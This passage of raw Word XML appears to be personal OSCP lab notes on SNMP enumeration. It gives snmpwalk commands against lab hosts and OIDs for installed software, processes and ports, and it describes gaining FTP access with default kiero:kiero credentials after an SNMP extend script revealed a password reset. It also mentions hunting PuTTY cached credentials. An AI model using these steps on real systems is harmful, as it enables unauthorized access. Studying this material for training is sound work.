        <w:t xml:space="preserve">This is from OSCP-B .149 and it revealed hint for default password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in OSCP-C .156 for creds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003100">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTEND-MIB::nsExtendObjects is a table of admin-defined custom scripts/commands exposed via SNMP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Down in the screenshot below, we find one of these custom scripts ran is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/john/RESET_PASSWD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003102">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it as a “backdoor” into whatever the sysadmin decided to publish.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003103">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s not a standard OID like uptime or processes — it’s custom and can reveal or even let you execute local commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003104">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109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3105">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We found two usernames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003106">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it said that Kiero password was reset to default. If you google it, kiero is an application and it's default password is kiero so I tried kiero:kiero for FTP and I got in!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003107">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To understand the output, you need these two lines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003108">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTEND-MIB::nsExtendCommand."RESET" = STRING: /home/john/RESET_PASSWD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NET-SNMP-EXTENDOutLine."RESET" = STRING: Resetting password of kiero to the default value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This basically means whenever we run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/john/RESET_PASSWD </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we reset password of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiero </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's numeric OID is: 1.3.6.1.4.1.8072.1.3.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 192.168.236.145 1.3.6.1.2.1.25.6.3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000310F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerating installed services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003110">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP A .145</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We found PuTTY, so we looked at the PuTTY registry to try and find cached credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could have also seen it in winPEAS output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003113">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003114">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003115">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 -t 10 192.168.50.151</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003116">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate ENTIRE MIB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003117">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try adding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Oa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to the command.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This parameter will automatically translate any hexadecimal string into ASCII that was otherwise not decoded.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003118">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 6.4.6. SNMP Enumeration Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003119">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 10 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">option to increase the timeout period to 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="525"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 6.4.6. SNMP Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate running processes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It might</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveal vulnerable applications or even indicate which kind of anti-virus is running on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 6.4.6. SNMP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000311F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003120">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003121">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate open TCP ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003122">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It can disclose ports that are listening only locally and thus reveal a new service that had been previously unknown</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003123">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 6.4.6. SNMP Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003124">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003125">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003126">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003127">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003128">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003129">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
